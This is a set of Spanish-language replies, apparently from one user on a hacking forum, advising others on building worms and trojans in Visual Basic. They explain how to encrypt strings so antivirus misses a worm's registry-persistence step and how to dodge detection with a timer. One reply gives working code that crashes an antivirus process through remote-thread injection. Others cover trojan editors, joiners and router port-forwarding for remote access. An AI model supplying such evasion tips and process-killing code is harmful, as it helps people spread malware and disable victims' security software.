Mensajes

Eso no lo puedes cifrar  Lo q se encriptan son las cadenas, lo q va entre " " 
Si el AV te detecta eso, ponlo en un timer con intervaleo 1 en vez de en el form load y veras como no te lo detecta

Vamos a ver tu tienes que tener dos funciones. Una q enkripte y otra que desencripte. Entonces tu imaginate q tienes una cadena que es detectada por el AV, por ejemplo la de añadirse al registro. Lo que tienes que hacer es cifrar la cadena para añadirse al reg con tu funcion encriptadora, todo esto en un programa independiente, imagina q la cadena cifrada que obtienes es esto "SDFS54sdf35435216%&$%&" pues ahora desde tu worm tienes que llamar a la funcion para añadir al reg con esa cadena. Por ej, imagina q la funcion para añadir al reg se llama "Reg" y la funcion para descifrar "descifra", pues tienes que llamarla así:

Código [Seleccionar] Expandir

Reg (descifra("SDFS54sdf35435216%&$%&"))

P.D. cuales son las funciones de los worm?.. o en otras palabras como funcionan?... acaso sirven para unirse a otros programas para no ser detectados tan facilmente o para que sirven...?

http://es.wikipedia.org/wiki/Gusano_inform%C3%A1tico

see, pero yo uso el propertybag que es mas origina

Jajaja pues si, no pasa na 

Eso es lo q hace mi ejemplo....

Los editores de troyanos no compilan el archivo ni mucho menos, lo llevan ya compilado "pegado". Mira aki te dejo un ejemplo de editor de troyano:

http://foro.elhacker.net/index.php/topic,171824.0.html

A ver, por partes 

Lo primero q tienes q hacer es abrir el ms-dos y usar el comando ipconfig /all. De todo lo q te ponga aki son importantes dos cosas, la puerta de enlace (direccion del router vamos) y tu ip local.

Ahora abres tu explorador (firefox, IE...) y pones la puerta de enlace, generalmente 192.168.1.1.  Ahora dependiendo de la marca de tu router tendras q hacer una cosa u otra para abrir los puertos, pero siempre vas a tener q elegir que puerto abrir (el q use rtu programa en este caso) y el pc hacia el q lo kieres abrir, aki es donde tienes q poner tu ip local (la q antes has visto en el ms-dos).
Ahora guardas la configuracion y ya esta, podras conectarte al Pc q está detrás del router con su ip externa. Mirala en http://www.adslayuda.com/ip.html por ejemplo.

¿Hay algo en VB  que me permita abrir los puertos del router?
¿O eso depende la marca del Router?

Depende de la marca del router, lo puedes hacer a traves del telnet

En caso de mapear los puertos del IP Router, encargado de ser el distribuidor de Internet.
¿Como escribiría la dirección completa del puerto?

Perdón?? la direccion del puerto es un numero, el protocolo Tcp/ip y lo unico q tienes q poner mas aparte de eso es la ip local del pc hacia el q kieres abrirlo...

jojojo no tienes algun link EON

Pues es q depende de la marca del router, es tan facil como poner en google "abrir puertos" + marca router y ya te sale como hacerlo. Solo hay q usar ipconfig /all para saber la puerta de enlace y tu ip en la lan.

De todas formas si alguien lo intenta hacer y no le sale puede preguntar por aki alguna duda mas concisa... 

Pues depende del proceso.. por ej el kav esta protegido por un driver y es "imposible" matarlo (desde luego yo no se como..)

Prueva a escribir en la direccion del proceso para q pete, mira este ejemplo (no es mio, es de Hendrix  )

Código [Seleccionar] Expandir

Dim Hendrix As String

Const PROCESS_ALL_ACCESS = &H1F0FFF

Const MEM_COMMIT = &H1000
Const MEM_RESERVE = &H2000
Const MEM_DECOMMIT = &H4000
Const MEM_RELEASE = &H8000
Const MEM_FREE = &H10000
Const MEM_PRIVATE = &H20000
Const MEM_MAPPED = &H40000
Const MEM_TOP_DOWN = &H100000
Const PAGE_READWRITE = &H4&

Private Sub Form_Load()
Dim PID As Long
Dim proc As Long
Dim nload As Long
Dim rems As Long
Dim DLL

Hendrix = "Crash"



PID = 2820 'Este es el pid del proceso a finalizar
proc = OpenProcess(PROCESS_ALL_ACCESS, False, PID)
nload = GetProcAddress(GetModuleHandle("kernel32.dll"), "LoadLibraryA")
rems = VirtualAllocEx(proc, 0, Len(Hendrix), MEM_COMMIT, PAGE_READWRITE)
WriteProcessMemory proc, ByVal rems, Hendrix, 5, 0
CreateRemoteThread proc, 0, 0, nload, rems, 0, 0
CloseHandle proc
End
End Sub
Created by GeSHI 1.0.7.20


'Modulo:


GeSHi (vb):
Public Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long
Public Declare Function GetProcAddress Lib "kernel32" (ByVal hModule As Long, ByVal lpProcName As String) As Long
Public Declare Function GetModuleHandle Lib "kernel32" Alias "GetModuleHandleA" (ByVal lpModuleName As String) As Long
Public Declare Function VirtualAllocEx Lib "kernel32" (ByVal hProcess As Long, ByVal lpAddress As Long, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As Long
Public Declare Function WriteProcessMemory Lib "kernel32" (ByVal hProcess As Long, lpBaseAddress As Any, lpBuffer As Any, ByVal nSize As Long, lpNumberOfBytesWritten As Long) As Long
Public Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long
Public Declare Function CreateRemoteThread Lib "kernel32" (ByVal hProcess As Long, lpThreadAttributes As Long, ByVal dwStackSize As Long, lpStartAddress As Long, lpParameter As Any, ByVal dwCreationFlags As Long, lpThreadId As Long) As Long


Tienes q abrir el puerto del router hacia el pc deseado, google para mas info

Lo q tu kieres hacer freeze es algo parecido a un joiner xDD a ver empezado por ahí, aunke veo q al final lo has logrado